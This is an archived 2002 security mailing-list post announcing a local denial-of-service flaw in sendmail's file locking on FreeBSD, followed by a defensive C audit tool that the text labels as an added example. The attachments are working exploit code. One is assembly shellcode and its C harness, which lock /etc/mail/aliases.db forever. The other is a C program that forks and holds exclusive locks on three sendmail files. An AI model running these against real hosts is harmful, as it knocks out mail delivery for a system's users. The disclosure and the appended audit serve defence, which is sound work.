8495352 2002-05-24 01:48 -0400 /14 lines/ KF <dotslash@snosoft.com>
Sent by: joel@lysator.liu.se
Imported: 2002-05-24 20:52 by Brevbäraren
External recipient: bugtraq <bugtraq@securityfocus.org>
External recipient: vuln-dev@security-focus.com
Recipient: Bugtraq (import) <22389>
Subject: Sendmail file locking - PoC
------------------------------------------------------------
From: KF <dotslash@snosoft.com>
To: bugtraq <bugtraq@securityfocus.org>, vuln-dev@security-focus.com
Message-ID: <3CEDD441.3070504@snosoft.com>

A problem has been identified in sendmail that can result in a denial of
service attack. Attached is proof of concept code for this issue.

http://www.sendmail.org/LockingAdvisory.txt

Have a safe Memorial Day, folks.

-KF
(8495352) /KF <dotslash@snosoft.com>/-----(Rewrapped)
Attachment (text/plain) in text 8495354
Attachment (text/plain) in text 8495355
Attachment (text/plain) in text 8495356

8495354 2002-05-24 01:48 -0400 /40 lines/ KF <dotslash@snosoft.com>
Attachment filename: "sendmail-DoS.S"
Imported: 2002-05-24 20:52 by Brevbäraren
External recipient: bugtraq <bugtraq@securityfocus.org>
External recipient: vuln-dev@security-focus.com
Recipient: Bugtraq (import) <22390>
Attachment (text/plain) to text 8495352
Subject: Attachment (sendmail-DoS.S) to: Sendmail file locking - PoC
------------------------------------------------------------
;
; Safemode.org, written by zillion 2002/05/24
; http://www.snosoft.com : zillion@snosoft.com
; http://www.sendmail.org/LockingAdvisory.txt
;

BITS 32

        jmp short callit

doit:
        pop esi                 ; esi -> the path string pushed by "call doit"
        xor eax,eax
        mov [esi + 20],al       ; NUL-terminate the 20-byte path

        ; open(path, O_RDONLY): FreeBSD syscall 5, args pushed right to left,
        ; plus one dummy push for the BSD syscall calling convention
        push eax
        push esi
        mov al,5
        push eax
        int 0x80

        ; flock(fd, LOCK_EX): FreeBSD syscall 131; eax holds the fd from open()
        push byte 0x2
        push eax
        mov al,131
        push eax
        int 0x80

; We're going to stay forever ;-)
        sub cl,0x3
l00p:
        js l00p

callit:
        call doit
        db '/etc/mail/aliases.db'

(8495354) /KF <dotslash@snosoft.com>/---------------

8495355 2002-05-24 01:48 -0400 /24 lines/ KF <dotslash@snosoft.com>
Attachment filename: "sendmail-DoS.c"
Imported: 2002-05-24 20:52 by Brevbäraren
External recipient: bugtraq <bugtraq@securityfocus.org>
External recipient: vuln-dev@security-focus.com
Recipient: Bugtraq (import) <22391>
Attachment (text/plain) to text 8495352
Subject: Attachment (sendmail-DoS.c) to: Sendmail file locking - PoC
------------------------------------------------------------
/*
   FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db

   Written by zillion (at http://www.safemode.org && http://www.snosoft.com)

   More info: http://www.sendmail.org/LockingAdvisory.txt
*/

/* Assembled form of sendmail-DoS.S above (jmp/pop string-addressing trick,
   open() and flock() syscalls, endless loop, then the path bytes). */
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
"\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
"\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
"\x69\x61\x73\x65\x73\x2e\x64\x62";

int main()
{
   int *ret;

   /* Classic shellcode harness: overwrite main()'s saved return address
      so the shellcode runs when main() returns. */
   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;
}

(8495355) /KF <dotslash@snosoft.com>/-----(Rewrapped)

8495356 2002-05-24 01:48 -0400 /42 lines/ KF <dotslash@snosoft.com>
Attachment filename: "sendmail-filelock-dos.c"
Imported: 2002-05-24 20:52 by Brevbäraren
External recipient: bugtraq <bugtraq@securityfocus.org>
External recipient: vuln-dev@security-focus.com
Recipient: Bugtraq (import) <22392>
Attachment (text/plain) to text 8495352
Subject: Attachment (sendmail-filelock-dos.c) to: Sendmail file locking - PoC
------------------------------------------------------------
#include <fcntl.h>
#include <sys/file.h>   /* flock(), LOCK_EX */
#include <unistd.h>

/*
   Stupid piece of code to test the sendmail lock vulnerability on FreeBSD.
   Run this and try sendmail -t on FreeBSD for example.

   More info: http://www.sendmail.org/LockingAdvisory.txt

   zillion (at safemode.org && snosoft.com)

   http://www.safemode.org
   http://www.snosoft.com
*/

int main()
{
   if(fork() == 0) {

      char *lock1 = "/etc/mail/aliases";
      char *lock2 = "/etc/mail/aliases.db";
      char *lock3 = "/var/log/sendmail.st";
      int fd;

      /* Each file is opened read-only, which is all that is needed to take
         an exclusive lock (0x02 == LOCK_EX) on these files. */
      fd = open(lock1,O_RDONLY);
      flock(fd,0x02);

      fd = open(lock2,O_RDONLY);
      flock(fd,0x02);

      fd = open(lock3,O_RDONLY);
      flock(fd,0x02);

      /* We are here to stay! */
      for(;;) {}
   }
   return 0;
}

(8495356) /KF <dotslash@snosoft.com>/---------------
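The attached PoC works because a process only needs read access to a file to take an exclusive flock() on it, so any file a privileged daemon locks becomes a local denial-of-service handle if untrusted users can open it. The audit below is an added example and is not part of KF's post, zillion's code or sendmail itself. It takes the three paths named in the PoC and reports, for each, whether group or other users can read it and whether some other process is holding an exclusive lock on it right now (the probe uses a non-blocking shared lock so it never blocks and never excludes readers). The paths come from the page; the policy that these files should carry no group/other read bit is this example's assumption and is not quoted from the advisory.

```c
/*
 * Added audit example, not part of the original post or of sendmail.
 * For each file a privileged daemon locks with flock(), report
 *  (a) whether an unprivileged user could open it for reading, which is
 *      all that is needed to take an exclusive flock() on it, and
 *  (b) whether something is holding an exclusive lock on it right now.
 * The "no group/other read" policy is an assumption of this example.
 */
#define _DEFAULT_SOURCE 1
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if group or other may read the file, 0 if not, -1 on stat() failure. */
int readable_by_untrusted(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & (S_IRGRP | S_IROTH)) ? 1 : 0;
}

/* 1 if an exclusive flock() is currently held by another open file
 * description, 0 if the file is free, -1 if it cannot be opened/probed.
 * A non-blocking shared lock fails with EWOULDBLOCK only while someone
 * holds LOCK_EX, and is released immediately afterwards. */
int exclusively_locked(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    if (flock(fd, LOCK_SH | LOCK_NB) != 0) {
        int held = (errno == EWOULDBLOCK);
        close(fd);
        return held ? 1 : -1;
    }
    flock(fd, LOCK_UN);
    close(fd);
    return 0;
}

/* Audit a list of paths; prints each finding and returns how many there were. */
int audit_lock_files(const char *const *paths, size_t n)
{
    int findings = 0;
    for (size_t i = 0; i < n; i++) {
        int r = readable_by_untrusted(paths[i]);
        int l = exclusively_locked(paths[i]);
        if (r == 1) {
            printf("%s: readable by group/other, any local user can flock() it\n",
                   paths[i]);
            findings++;
        }
        if (l == 1) {
            printf("%s: exclusive lock currently held by another process\n",
                   paths[i]);
            findings++;
        }
        if (r < 0 && l < 0)
            printf("%s: cannot inspect (%s)\n", paths[i], strerror(errno));
    }
    return findings;
}

int main(void)
{
    /* The files named in the attached PoC (sendmail's paths on FreeBSD). */
    static const char *const files[] = {
        "/etc/mail/aliases",
        "/etc/mail/aliases.db",
        "/var/log/sendmail.st",
    };
    int n = audit_lock_files(files, sizeof files / sizeof files[0]);
    printf("%d finding(s)\n", n);
    return n ? 1 : 0;
}
```

Run it as root on the mail host (it needs to open the files it probes); a non-zero exit means at least one file is either lockable by any local user or already locked by someone else, which is exactly the condition the PoC depends on.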